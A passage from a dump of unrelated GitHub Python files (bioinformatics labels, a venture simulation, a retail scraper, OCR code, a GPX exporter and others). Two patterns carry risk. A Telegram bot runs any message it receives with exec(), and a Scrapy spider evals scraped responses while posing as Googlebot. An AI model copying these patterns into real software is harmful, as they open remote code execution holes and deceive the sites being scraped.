机器翻译/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"11505319077","text":"#!/usr/bin/env python3\n\nimport pandas as pd\n\neuk5table = pd.read_csv('../phylogenetic_profiles.csv', index_col=\"Abbreviation\")\nspecies_abbrevs = euk5table.index.tolist()\n\nwith open('iTOL_label_names.txt', 'w') as f:\n f.write('LABELS\\n')\n f.write('SEPARATOR TAB\\n')\n f.write('DATA\\n')\n for abbrev in species_abbrevs:\n species_name = euk5table.loc[abbrev]['Scientific name']\n f.write(abbrev + '\\t' + species_name + '\\n')\n","repo_name":"jolienvanhooff/SMCevolution","sub_path":"py_scripts/itol_names.py","file_name":"itol_names.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"38093623396","text":"#__author__ = 'wlarson'\n\nimport time\nfrom Looper import Looper\n\n# Success assmption\ngoal2030 = 3\n\n# Screen assumptions\nscreenRate = 0.5\nscreenTime = 1\nscreenCost = 0.1\nscreenHeadcount = 0\nscreenYearly = 5\nscreenAssumptions = [screenRate, screenTime, screenCost, screenHeadcount, screenYearly]\n\n# Evaluate assumptions\nevaluateRate = 0.75\nevaluateTime = 1\nevaluateCost = 1\nevaluateHeadcount = 0.33\nevaluateAssumptions = [evaluateRate, evaluateTime, evaluateCost, evaluateHeadcount]\n\n# Incubate assumptions\nincubateRate = 0.75\nincubateTime = 3\nincubateCost = 5\nincubateHeadcount = 3\nincubateAssumptions = [incubateRate, incubateTime, incubateCost, incubateHeadcount]\n\n# Accelerate assumptions\naccelerateRate = 0.25\naccelerateTime = 4\naccelerateCost = 10\naccelerateHeadcount = 5\naccelerateGrowth = 0.25\naccelerateAssumptions = [accelerateRate, accelerateTime, accelerateCost, accelerateHeadcount, accelerateGrowth]\n\n# Develop assumptions\ndevelopRate = 0.65\ndevelopTime = 5\ndevelopAssumptions = [developRate, developTime]\n\nt0= time.time()\n\nscreenLimit = 40\nloopLimit = 1000\n\nloop = Looper(screenLimit, loopLimit, goal2030, screenAssumptions, evaluateAssumptions, incubateAssumptions, accelerateAssumptions, developAssumptions)\n\nloop.runLoop()\n\nprint(\"Successes: \" + str(loop.getAverageSuccesses()))\nprint(\"Screen: \" + str(loop.getAverageScreen()))\nprint(\"Evaluate: \" + str(loop.getAverageEvaluate()))\nprint(\"Incubate: \" + str(loop.getAverageIncubate()))\nprint(\"Accelerate: \" + str(loop.getAverageAccelerate()))\nprint(\"Develop: \" + str(loop.getAverageDevelop()))\nprint(\"Total budget: \" + str(loop.getAverageBudget()))\nprint(\"Peak budget: \" + str(loop.getPeakBudget()))\nprint(\"Peak headcount: \" + str(loop.getPeakHeadcount()))\nprint(\"Probability of succeeding: \" + str(loop.getProbability()))\n\nt1 = time.time() - t0","repo_name":"winstonlarson/venture_simulation","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"20539743257","text":"import re\nimport urllib\nimport logging\nfrom scrapy.spider import BaseSpider\nfrom scrapy.selector import HtmlXPathSelector\nfrom scrapy.http import Request, HtmlResponse\nfrom scrapy.utils.response import get_base_url\nfrom scrapy.utils.url import urljoin_rfc\nfrom product_spiders.items import Product, ProductLoaderWithNameStrip as ProductLoader\nfrom keteritems import KeterMeta, Review, ReviewLoader\nimport urlparse\n\nfrom phantomjs import PhantomJS\n\nclass CanadiantireCaSpider(BaseSpider):\n name = 'canadiantire.ca'\n allowed_domains = ['canadiantire.ca', 'bazaarvoice.com']\n user_agent = 'Googlebot/2.1 (+http://www.google.com/bot.html)'\n\n def start_requests(self):\n search_url = 'http://www.canadiantire.ca/en/search-results.html?count=16&searchByTerm=true&viewMode=grid&q=%(brand)s'\n for brand in ('Keter', 'Suncast', 'Rubbermaid', 'Lifetime', 'Step 2', 'Step2', 'Sterilite'):\n yield Request(search_url % {'brand': urllib.quote(brand)},\n meta={'brand': brand}, callback=self.parse_product_list)\n\n # This search by brand skips valid products, suck\n def parse_search(self, response):\n hxs = HtmlXPathSelector(response)\n base_url = get_base_url(response)\n\n brands = hxs.select(u'//h1[@class=\"ls-menu-block__header\" and contains(text(), \"Brand\")]'\n u'/following-sibling::ul[@class=\"ls-menu-block__list\"]/li')\n for brand in brands:\n brand_name = brand.select(u'./a/text()').extract()\n if brand_name[0].lower().startswith(response.meta['brand'].lower()):\n yield Request(urljoin_rfc(base_url, brand.select(u'./a/@href').extract()[0]),\n meta=response.meta, callback=self.parse_product_list)\n if not brands:\n for x in self.parse_product_list(response):\n yield x\n\n def parse_product_list(self, response):\n hxs = HtmlXPathSelector(response)\n base_url = get_base_url(response)\n\n links = hxs.select(u'//h2/a/@href').extract()\n for url in links:\n url = urljoin_rfc(get_base_url(response), url)\n yield Request(url, meta=response.meta, callback=self.parse_product)\n\n pages = hxs.select('//li[@class=\"pagination\"]//a/@href').extract()\n if pages:\n # next_page = int(re.search(u'page=(\\d+)', response.url).group(1)) + 1\n # url = re.sub(u'page=(\\d+)', 'page=' + str(next_page), response.url)\n for page_url in pages:\n yield Request(urljoin_rfc(base_url, page_url),\n meta=response.meta,\n callback=self.parse_product_list)\n\n def parse_product(self, response):\n browser = PhantomJS()\n self.log('>>> BROWSER: GET => %s' % response.url)\n browser.get(response.url)\n self.log('>>> BROWSER: OK!')\n\n hxs = HtmlXPathSelector(text=browser.driver.page_source)\n\n browser.close()\n self.log('>>> BROWSER: Closed')\n\n sku = hxs.select(u'//*[@class=\"displaySkuCode\"]//text()').extract()\n\n sku = sku[0].replace('#', '')\n\n product_loader = ProductLoader(item=Product(), response=response)\n product_loader.add_xpath('name', u'//div[contains(@class,\"title\")]//h1/text()')\n product_loader.add_value('sku', sku)\n product_loader.add_xpath('category', u'//ul[contains(@class, \"pd-breadcrumbs\")]/li[2]/a/text()')\n product_loader.add_value('identifier', sku)\n price = hxs.select(u'//div[contains(@class, \"product-price__reg-price\")]/text()').extract()\n product_loader.add_value('price', price[0].replace('Reg.', ''))\n product_loader.add_value('brand', response.meta['brand'].lower())\n product_loader.add_value('url', response.url)\n image_url = hxs.select(u'/html/head/link[@rel=\"image_src\"]/@href').extract()\n if image_url:\n product_loader.add_value('image_url', image_url[0])\n product = product_loader.load_item()\n\n metadata = KeterMeta()\n metadata['brand'] = response.meta['brand']\n metadata['reviews'] = []\n product['metadata'] = metadata\n response.meta['product'] = product\n\n brand = response.meta['brand'].lower()\n if brand not in product['name'] and brand not in response.body.lower():\n return\n\n # http://www.canadiantire.ca/AST/browse/2/OutdoorLiving/3/OutdoorStorage/Sheds/PRD~0600292P/Keter+Rattan+Vertical+Shed.jsp?locale=en\n # http://canadiantire.ugc.bazaarvoice.com/9045/0600292P/reviews.djs?format=embeddedhtml\n # \n part1 = hxs.select(u'//script[starts-with(@src,\"http://canadiantire.ugc.bazaarvoice.com/static/\")]/@src').extract()[0].split('/')[-2]\n part2 = hxs.select('//div[@id=\"bazaarVoiceConfig\"]/@data-product-code').extract()[0]\n\n yield Request('http://canadiantire.ugc.bazaarvoice.com/%s/%s/reviews.djs?format=embeddedhtml' % (part1, part2),\n meta=response.meta, callback=self.parse_review_js)\n\n def parse_review_js(self, response):\n for line in response.body.split('\\n'):\n if line.startswith('var materials='):\n body = line.lstrip('var materials=').rstrip(',')\n break\n\n try:\n body = eval(body)\n except:\n logging.error('Failed to parse: ' + repr(response.body))\n\n # Emulate \"normal\" HTML response\n body = ('' +\n '%s' +\n '') % (body['BVRRSourceID'].replace('\\\\/', '/'))\n\n response2 = HtmlResponse(url=response.url, body=body)\n response2.request = response.request\n\n for x in self.parse_review(response2):\n yield x\n\n def parse_review(self, response):\n hxs = HtmlXPathSelector(response)\n product = response.meta['product']\n\n for review in hxs.select(u'//div[starts-with(@id, \"BVRRDisplayContentReviewID_\")]'):\n review_loader = ReviewLoader(item=Review(), selector=review, date_format=\"%B %d, %Y\")\n review_loader.add_value('date', review.select(u'.//span[contains(@class,\"BVRRReviewDate\")]/text()').extract()[1])\n\n title = review.select(u'.//span[contains(@class,\"BVRRCustomFullTitle\")]/text()').extract()\n text = ' '.join(review.select(u'.//span[contains(@class,\"BVRRReviewText\")]/text()').extract())\n\n if title:\n full_text = title[0] + '\\n' + text\n else:\n full_text = text\n\n pros = review.select(u'.//span[contains(@class,\"BVRRReviewProTags\")]/span/text()').extract()\n cons = review.select(u'.//span[contains(@class,\"BVRRReviewConTags\")]/span/text()').extract()\n if pros:\n full_text += '\\nPros: ' + ', '.join(pros)\n if cons:\n full_text += '\\nCons: ' + ', '.join(cons)\n\n review_loader.add_value('full_text', full_text)\n rating = review.select(u'.//img[@class=\"BVImgOrSprite\"]/@title').extract()[0]\n review_loader.add_value('rating', rating.split()[0])\n review_loader.add_value('url', response.url)\n\n product['metadata']['reviews'].append(review_loader.load_item())\n\n next_url = hxs.select(u'//a[contains(@name,\"BV_TrackingTag_Review_Display_NextPage\")]/@data-bvjsref').extract()\n if next_url:\n yield Request(next_url[0],\n meta=response.meta, callback=self.parse_review_js)\n\n else:\n yield product\n","repo_name":"Godsoo/scraping","sub_path":"e-commerce/CompetitorMonitor/product_spiders/spiders/keter/canadiantire_ca.py","file_name":"canadiantire_ca.py","file_ext":"py","file_size_in_byte":7661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"37428539641","text":"import numpy as np\nimport logging\nfrom .glyph import Glyph\n\nlogger = logging.getLogger(__name__)\nlogi = logger.info\nlogd = logger.debug\n\n\ndef do_combine(self, other):\n \"\"\"\n\n :param Bantry self:\n :param Bantry other:\n0 :return:\n \"\"\"\n score, yell = 0, \"\"\n s, t = self.best_char, other.best_char\n ss, st = self.strength(), other.strength()\n\n suspects = ['ఏ', '-', '\"', \"'\", '.', 'ై',]\n ghpsshh = 'ఘపసషహఎ'\n heads = ['ి', 'ీ', 'ె', 'ే', '✓', '్']\n def is_sharer(c):\n return c[0] in heads or \\\n c is 'ై' or \\\n c in 'ఖఙజఞణ'\n\n lowprob = np.log(.95)\n vlprob = np.log(.70)\n if other is Space:\n return False\n else:\n return True\n\n # Strong rules resulting in immediate failure\n if s in heads and t[0] not in ghpsshh:\n score += 5\n yell += '*PSHG'\n\n # Weak rules, that help each other\n if self.area < self.xarea/4:\n score += 1\n yell += '+AREAS'\n if other.area < self.xarea/4:\n score += 1\n yell += '+AREAO'\n\n overlap = self.overlap(other)\n if overlap > .75:\n score += 1\n yell += '+OVLP:{:.0f}'.format(100*overlap)\n\n if t in suspects:\n score += 1\n yell += '+SUSPO'\n\n if s in suspects:\n score += 1\n yell += '+SUSPS'\n\n if not is_sharer(s) and not is_sharer(t) and overlap > .5:\n score += 2\n yell += '#OLNS'\n\n try:\n self.ngram[self.best_char, other.best_char]\n except KeyError:\n yell += '+DICT'\n score += 1\n\n if ss < vlprob:\n score += 1\n yell += '+VLPS{:.0f}'.format(100*np.exp(ss))\n\n if st < vlprob:\n score += 1\n yell += '+VLPO{:.0f}'.format(100*np.exp(st))\n\n if (ss < lowprob) and (st < lowprob):\n score += 1\n yell += '+LOWP{:.0f}&{:.0f}'.format(100*np.exp(ss), 100*np.exp(st))\n\n if score > 1:\n combined_area = self.combined_area(other)\n if combined_area < 3 * self.xarea:\n logi(\"Combining 'cos: \" + yell)\n return score > 1\n else:\n logi(\"Combined Area too big: {}>3*{}\".format(combined_area, self.xarea))\n\n\nclass Bantry(Glyph):\n \"\"\"Class used to process a space seperated line and store the probable\n characters and the respective liklihoods for one glyph.\n \"\"\"\n scaler = lambda *_: None\n classifier = lambda *_: ((\"\", 0),)\n ngram = ()\n\n def __init__(self, bantry_str=None):\n super().__init__(bantry_str)\n if bantry_str:\n self.scaled = self.scaler(self)\n self.likelies = self.classifier(self.scaled)\n logd(\"Initialized\\n{}\".format(self))\n\n @property\n def best_char(self):\n return max(self.likelies, key=lambda x: x[1])[0]\n\n def strength(self):\n return max(self.likelies, key=lambda x: x[1])[1]\n\n @property\n def strlikelies(self):\n return \" \".join(\"{}{:.4f}\".format(char, np.exp(lik)) for char, lik in self.likelies)\n\n def __str__(self):\n return super().__str__() + \"\\n\" + self.strlikelies\n\n def __repr__(self):\n return \"({}: {})\".format(self.best_char,\n int(100*np.exp(self.strength())))\n\n def combine(self, other):\n logd(\"Checking to combine\\n{}\\n{}\".format(self, other))\n\n if do_combine(self, other):\n combined = self + other\n combined.scaled = self.scaler(combined)\n combined.likelies = self.classifier(combined.scaled)\n if logger.isEnabledFor(logging.DEBUG):\n logi(\"Combining\\n{}\".format(combined))\n else:\n logi(\"Combining\\n{}\\n{}\\n{}\".format(self, other, combined))\n\n return True, combined\n else:\n return False, None\n\n\nclass MetaSpace(type):\n def __repr__(self):\n return \"Space\"\n\n\nclass Space(metaclass=MetaSpace):\n __metaclass__ = MetaSpace\n likelies = [(\" \", 0)]\n strlikelies = \" : 0\"\n best_char = \" \"\n strength = lambda: 0\n scaled = \"---\\n| |\\n---\"\n\n @classmethod\n def combine(cls, other):\n return False, None\n\n\nclass BantryFile():\n def __init__(self, name):\n in_file = open(name)\n self.file_bantries = []\n\n iword, iline = 0, 0\n line_bantries = []\n\n for bantry_str in in_file:\n e = Bantry(bantry_str)\n if e.linenum == iline:\n if e.wordnum > iword:\n iword = e.wordnum\n line_bantries.append(Space)\n line_bantries.append(e)\n\n elif e.linenum > iline:\n self.file_bantries.append(line_bantries)\n iword = 0\n iline += 1\n while iline < e.linenum:\n self.file_bantries.append([])\n iline += 1\n line_bantries = [e]\n\n else:\n raise ValueError(\"Line number can not go down.\")\n\n self.file_bantries.append(line_bantries)\n self.num_lines = len(self.file_bantries)\n\n self.text = \"\"\n for bantries_inline in self.file_bantries:\n for bantree in bantries_inline:\n self.text += bantree.best_char\n self.text += \"\\n\"\n\n in_file.close()\n\n def get_line_bantires(self, i):\n return self.file_bantries[i]\n\nif __name__ == \"__main__\":\n import sys\n from scaler import ScalerFactory\n\n banti_file_name = sys.argv[1] if len(sys.argv) > 1 else \"sample_images/praasa.box\"\n scaler_prms_file = sys.argv[2] if len(sys.argv) > 2 else \"scalings/relative48.scl\"\n\n Bantry.scaler = ScalerFactory(scaler_prms_file)\n bf = BantryFile(banti_file_name)\n\n for linenum in range(bf.num_lines):\n print('*' * 60)\n line_bantries = bf.get_line_bantires(linenum)\n for bantry in line_bantries:\n print(bantry.scaled)","repo_name":"TeluguOCR/datagen_duo","sub_path":"generator/banti/bantry.py","file_name":"bantry.py","file_ext":"py","file_size_in_byte":5884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"39363063805","text":"from kmeans_gpu import KMeans\r\nfrom tqdm import tqdm as tqdm\r\nimport torch\r\nimport random\r\n\r\n# Config\r\nbatch_size = 128\r\nfeature_dim = 1024\r\npts_dim = 3\r\nnum_pts = 256\r\nnum_cluster = 15\r\n\r\ncycle_range = random.randrange(20, 80, 20)\r\n\r\nfor i in tqdm(range(cycle_range)):\r\n # Create data\r\n features = torch.randn(batch_size, feature_dim, num_pts).to(\"cuda\")\r\n # Pay attention to the different dimension order between features and points.\r\n points = torch.randn(batch_size, num_pts, pts_dim).to(\"cuda\")\r\n\r\n # Create KMeans Module\r\n kmeans = KMeans(\r\n n_clusters=num_cluster,\r\n max_iter=100,\r\n tolerance=1e-4,\r\n distance='euclidean',\r\n sub_sampling=None,\r\n max_neighbors=15,\r\n )\r\n\r\n # Forward\r\n centroids, features = kmeans(points, features)\r\n\r\n # output:\r\n # >>> torch.Size([128, 15, 3]) torch.Size([128, 1024, 15])","repo_name":"Rachel-Finley/Thermal-and-Energy-Modeling","sub_path":"Benchmarks/K_MEANS_GPU_TEST.py","file_name":"K_MEANS_GPU_TEST.py","file_ext":"py","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"11351561279","text":"import descarteslabs as dl\n\ngdelt = list(filter(lambda fc: 'gdelt' in fc.name, dl.vectors.FeatureCollection.list()))\nprint(\"Available GDELT tables:\")\nprint(gdelt)\n\n\nfc = dl.vectors.FeatureCollection(gdelt[0].id) \n\n\nplaces = dl.Places()\nresults = places.search('nairobi')\n\n\nslug = results[0]['slug']\n\nplace = places.shape(slug)\n\nshape = place['geometry']\n\nfc = fc.filter(geometry=shape)\nprint(list(fc.features()))","repo_name":"karla-dl/tutorials","sub_path":"python_examples/gdelt.py","file_name":"gdelt.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"14590676268","text":"from io import StringIO\r\nimport contextlib\r\n\r\n@contextlib.contextmanager\r\ndef stdoutIO(stdout=None):\r\n old = sys.stdout\r\n if stdout is None:\r\n stdout = StringIO()\r\n sys.stdout = stdout\r\n yield stdout\r\n sys.stdout = old\r\n\r\nimport sys\r\nimport time\r\nimport pprint\r\nimport telepot\r\n\r\ndef handle(msg):\r\n content_type, chat_type, chat_id = telepot.glance(msg)\r\n print (content_type, chat_type, chat_id, msg['chat']['username'])\r\n print(msg['text'])\r\n\r\n if content_type == 'text':\r\n if msg['text'] == '/start':\r\n bot.sendMessage(chat_id, \"\"\"Type your code...\\n\r\nNote that python language is case sensitive!\\n\r\nTry these commands:\r\n print('Hello World')\r\n x = 2\r\n print(x)\r\n for i in range(10): print(i)\r\nor any desired code!\"\"\")\r\n elif msg['text'] == '/stop':\r\n bot.sendMessage(chat_id, 'Bye :(')\r\n else:\r\n #bot.sendMessage(chat_id, \"Python Code:\\n\" + msg['text'])\r\n code = msg['text']\r\n flag = True;\r\n with stdoutIO() as screen:\r\n try:\r\n exec(code)\r\n except Exception as exception:\r\n flag = False\r\n error = str(exception)\r\n print(error)\r\n\r\n result = screen.getvalue()\r\n if ((result.find('name') != -1) and (result.find('is not defined') != -1) and result != result.lower()):\r\n result += '\\n' + '-May help you: Python language is case sensitive!'\r\n if flag:\r\n output = '>>> Result\\n'\r\n else:\r\n output = '>>> Error\\n'\r\n\r\n #max_line = max([len(line) for line in result.split('\\n')])\r\n #if max_line < 12:\r\n # max_line = 12\r\n #elif max_line > 40:\r\n # max_line = 40\r\n #for i in range(max_line):\r\n # output = output + '_'\r\n output += '\\n' + result\r\n bot.sendMessage(chat_id, output)\r\n\r\n if content_type != 'text':\r\n bot.sendMessage(chat_id, \"\"\"It is not even a text, let alone a python code!\\n\r\nPlease send a TEXT content!\"\"\")\r\n\r\n\r\n# Getting the token from command-line is better than embedding it in code,\r\n# because tokens are supposed to be kept secret.\r\nTOKEN = ' '\r\n\r\nbot = telepot.Bot(TOKEN)\r\nbot.message_loop(handle)\r\nprint ('Listening ...')\r\n\r\n# Keep the program running.\r\nwhile 1:\r\n time.sleep(1)\r\n\r\n","repo_name":"hejazizo/Python-Compile-Telegram-Bot","sub_path":"python_compile_bot.py","file_name":"python_compile_bot.py","file_ext":"py","file_size_in_byte":2447,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"24012775354","text":"'''\nSolution - the primary idea is that the lcs of s and reversed s gives the longest palindromic\nsubsequence. Ths needs to be though and reviewed.\n'''\nclass Solution:\n def longestPalindromeSubseq(self, s: str) -> int:\n\n def longestCommonSubsequence(s1,s2):\n m = len(s1)\n n = len(s2)\n dt = [[0]*(n+1) for _ in range(m+1)]\n\n for row in range(m):\n for col in range(n):\n if s1[row]==s2[col]:\n dt[row+1][col+1] = dt[row][col] + 1\n else:\n dt[row+1][col+1] = max(dt[row][col+1],dt[row+1][col])\n \n return dt[m][n]\n \n revs=''\n for i in reversed(range(len(s))):\n revs = revs+s[i] \n \n return longestCommonSubsequence(s,revs)\n\n\n\n\n\n ","repo_name":"satyajitghosh/learningPy","sub_path":"neetcode/DynamicProg/LargestPalindromicSubsequence.py","file_name":"LargestPalindromicSubsequence.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"70883556252","text":"\"\"\"alter nodes add column latest version\n\nRevision ID: 230f8ce9c90f\nRevises: 8320b1c62d9\nCreate Date: 2012-07-17 20:32:54.466145\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '230f8ce9c90f'\ndown_revision = '8320b1c62d9'\n\nfrom alembic import op, context\nfrom sqlalchemy.sql import table, column\nfrom alembic import op\n\nimport sqlalchemy as sa\n\n\ndef upgrade():\n op.add_column('nodes', sa.Column('latest_version', sa.INTEGER))\n\n n = table(\n 'nodes',\n column('node', sa.Integer),\n column('latest_version', sa.Integer)\n )\n v = table(\n 'versions',\n column('node', sa.Integer),\n column('mtime', sa.Integer),\n column('serial', sa.Integer),\n )\n\n s = sa.select(\n [v.c.serial]).where(n.c.node == v.c.node).order_by(v.c.mtime).limit(1)\n op.execute(\n n.update().\n values({'latest_version': s})\n )\n\n\ndef downgrade():\n op.drop_column('nodes', 'latest_version')\n","repo_name":"grnet/synnefo","sub_path":"snf-pithos-backend/pithos/backends/lib/sqlalchemy/alembic/versions/230f8ce9c90f_alter_nodes_add_colu.py","file_name":"230f8ce9c90f_alter_nodes_add_colu.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","stars":133,"dataset":"github-code","pt":"32"} +{"seq_id":"38481324943","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport os\nimport argparse\nimport time\nimport pandas as pd\n\n\nNAME = 'exportGPX'\nDESCRIPTION = 'a command line tool to export Huawei tracking \\\nfiles to GPX files'\nDEBUG = False\n\n\ndef debug(message):\n \"\"\" Print debug message\n \"\"\"\n if DEBUG:\n print(message)\n\n\ndef normalize_timestamp(timestamp):\n \"\"\" Normalize timestamp to seconces since epoch\n \"\"\"\n if (str(timestamp).find('E12') >= 0 or\n len(str(int(float(timestamp)))) == 13):\n timestamp = int(float(timestamp) / 1000.0)\n else:\n timestamp = int(float(timestamp))\n return timestamp\n\n\ndef sec_to_datetime(timestamp):\n \"\"\" Convert secondes since epoch to a date and time\n \"\"\"\n return time.strftime(\"%d/%m/%Y %H:%M:%S %Z\", time.localtime(timestamp))\n\n\ndef sec_to_date(timestamp):\n \"\"\" Convert secondes since epoch to a date\n \"\"\"\n return time.strftime(\"%d/%m/%Y\", time.localtime(timestamp))\n\n\ndef sec_to_time(timestamp):\n \"\"\" Convert secondes since epoch to a time\n \"\"\"\n return time.strftime(\"%H:%M:%S\", time.localtime(timestamp))\n\n\ndef milli_to_datetime(timestamp):\n \"\"\" Convert millisecondes since epoch to a date and time\n \"\"\"\n return sec_to_datetime(int(timestamp)/1000)\n\n\ndef milli_to_date(timestamp):\n \"\"\" Convert millisecondes since epoch to a date\n \"\"\"\n return sec_to_date(int(timestamp)/1000)\n\n\ndef milli_to_time(timestamp):\n \"\"\" Convert millisecondes since epoch to a time\n \"\"\"\n return sec_to_time(int(timestamp)/1000)\n\n\ndef gpx_header():\n \"\"\" Return gpx valid header\n \"\"\"\n return \"\"\"\\\n\n\n \n \"\"\"\n\n\ndef gpx_footer():\n \"\"\" Return gpx valid footer\n \"\"\"\n return \"\"\"\\\n\n \n \n\"\"\"\n\n\ndef point(infos):\n \"\"\" Return gpx valid checkpoint with coordonates given\n \"\"\"\n if (str(infos.get('lat', '0')) == \"90.0\" and\n str(infos.get('lon', '0')) == \"-80.0\"):\n return \"\\r\\n\\\n \\r\\n\\\n \"\n else:\n return \"\\r\\n\\\n \\r\\n\\\n \" + str(infos.get('alt', '0')) + \"\\r\\n\\\n \\r\\n\\\n \\r\\n\\\n \\r\\n\\\n \" + str(int(infos.get('heart_rate', 0)))\\\n + \"\\r\\n\\\n \" + str(infos.get('vitesse', 0))\\\n + \"\\r\\n\\\n \\r\\n\\\n \\r\\n\\\n \"\n\n\ndef get_datas(file_in):\n \"\"\" Return pandas dataframe with all informations\n \"\"\"\n debug('Opening ' + file_in + '...')\n with open(file_in, 'r') as f_in:\n debug('Reading datas...')\n lbs, heart_rate, cad, pace_minute = [], [], [], []\n speed_per_seconde, beat_per_minute, alt = [], [], []\n for line in f_in:\n dic = {}\n infos = line.split(';')\n type_data = infos[0].split('=')[1]\n k = int(infos[1].split('=')[1])\n if type_data == 'lbs':\n # Location per seconde\n dic['lat'] = float(infos[2].split('=')[1])\n dic['lon'] = float(infos[3].split('=')[1])\n# dic['alt'] = float(infos[4].split('=')[1])\n dic['t'] = normalize_timestamp(infos[5].split('=')[1])\n lbs.append(dic)\n else:\n value = int(float(infos[2].split('=')[1]))\n if type_data == 'p-m':\n # Pace / Minutes\n dic['m'] = int(k) // 10000 # Nb meters since start\n dic['s'] = value # NB secondes to do 1000 meters\n dic['pace'] = str(int(value) // 60) + \"'\"\\\n + str(int(value) % 60) + '\"'\n pace_minute.append(dic)\n elif type_data == 'b-p-m':\n # Beat per minutes ?\n dic['k'] = k\n dic['value'] = value\n beat_per_minute.append(dic)\n elif type_data == 'h-r':\n # Heart Rate\n dic['t'] = normalize_timestamp(k)\n dic['heart_rate'] = value\n heart_rate.append(dic)\n elif type_data == 's-r':\n # Stride Rate\n dic['t'] = normalize_timestamp(k)\n dic['stride'] = value\n cad.append(dic)\n elif type_data == 'rs':\n # Speed per seconde\n dic['s'] = k # Nb secondes since start\n dic['m'] = value # Speed in nb decimeter per seconde\n dic['speed'] = int(value) / 10 * 3600 / 1000\n speed_per_seconde.append(dic)\n elif type_data == 'alti':\n # Alt\n dic['t'] = normalize_timestamp(k)\n dic['alt'] = value\n alt.append(dic)\n else:\n debug('Data type unknown: ' + type_data)\n\n dataframe = pd.DataFrame(lbs).sort_values(by=['t'], ascending=True)\n dataframe = pd.merge(dataframe, pd.DataFrame(heart_rate),\n on='t', how='outer')\n dataframe = pd.merge(dataframe, pd.DataFrame(alt), on='t',\n how='outer')\n dataframe['s'] = dataframe.index\n dataframe = dataframe[dataframe['lat'].notnull()]\\\n .sort_values(by=['t'], ascending=True)\n dataframe = dataframe[dataframe['lat'] != 90.0]\n dataframe = pd.merge(dataframe, pd.DataFrame(speed_per_seconde),\n on='s', how='outer')\n dataframe = dataframe.fillna(method='ffill')\n dataframe = dataframe.fillna(method='bfill')\n return dataframe\n\n\ndef process(file_in):\n \"\"\" Process files to get all geos and states informations\n \"\"\"\n if file_in.find('HiTrack_') >= 0:\n info = file_in.split(\"_\")[1]\n start = info[0:13]\n end = info[13:-5]\n date = milli_to_date(start).replace(\"/\", \"\")\n start_time = milli_to_time(start).replace(':', \"\")\n end_time = milli_to_time(end).replace(':', \"\")\n file_out = date + \"_\" + start_time + \"_\" + end_time + \".gpx\"\n else:\n print('You have to give a original HiTrack_ file in entry, not : '\n + file_in)\n return None\n\n dataframe = get_datas(file_in)\n\n text = gpx_header()\n for _, data in dataframe.iterrows():\n text += point(data)\n text += gpx_footer()\n text = text.replace(\" \\r\\n \", \"\")\n\n with open(file_out, 'w') as fout:\n fout.write(text)\n print(file_out + ' processed')\n return text\n\n\ndef main():\n \"\"\" Get args and launch action to do over files\n \"\"\"\n parser = argparse.ArgumentParser(description=DESCRIPTION)\n parser.add_argument(\n \"input_file\", nargs='*', default=os.getcwd(),\n help=\"HiTrack file to convert to GPX\")\n parser.add_argument(\n '-d', '--debug', action='store_true', help=\"enable debug file_out\")\n args = parser.parse_args()\n if args.debug:\n global DEBUG\n DEBUG = args.debug\n input_file = args.input_file\n\n if input_file == os.getcwd():\n for _, _, files in os.walk(input_file):\n for file_name in files:\n if file_name.find('HiTrack_') >= 0:\n process(file_name)\n else:\n for file_name in input_file:\n process(file_name)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Flaykz/HuaweiToGPX","sub_path":"export_gpx.py","file_name":"export_gpx.py","file_ext":"py","file_size_in_byte":8152,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"32"} +{"seq_id":"33448047021","text":"# 부녀회장이 될테야\n# 1. 재귀로 구현해보자 -> 시간 초과\n# 2. 반복문으로 구현\n\n# 1. 재귀함수\ndef humans(floor, ho):\n if floor == 0:\n return ho\n if ho == 1:\n return humans(floor-1,ho)\n\n return humans(floor,ho-1) + humans(floor-1, ho)\n\n\n# 2. 반복문, 배열을 미리 선언해서 사용했다가 append로 추가하는식으로 변경함. 이게 더 파이썬에 맞는것 같다\n# 소요시간은 오히려 더걸려서 기존방식을 고수함\napartment = [[x for x in range(16)] for y in range(15)]\nfor floor in range(1,15):\n for ho in range(1,15):\n apartment[floor][ho] = apartment[floor-1][ho] + apartment[floor][ho-1]\n\nt = int(input())\nfor _ in range(t):\n k = int(input())\n n = int(input())\n\n print(apartment[k][n])","repo_name":"c4fiber/Algorithm_Study","sub_path":"baekjoon/basic-math1/2775.py","file_name":"2775.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"11572450631","text":"# Author : YeAung\n# Email : yeyintaung.ya276@gmail.com\n# download pritrain VGG net here : https://www.vlfeat.org/matconvnet/models/imagenet-vgg-verydeep-19.mat\n\n\nfrom core.preprocessor import Preprocessor\nfrom core.NST import NST\nimport matplotlib\n\nmatplotlib.use('TkAgg')\n\ncontent_image = Preprocessor.transform('images/louvre_small.jpg')\n\nstyle_image = Preprocessor.transform('images/monet.jpg')\n\nNST.initialize('imagenet-vgg-verydeep-19.mat')\n\nNST.set_cost_weights(alpha=0.2, beta=0.8)\n\ng_img, _ = NST.generate(content_image,style_image,no_iter=200, display=True)\n\nprocessed_img = 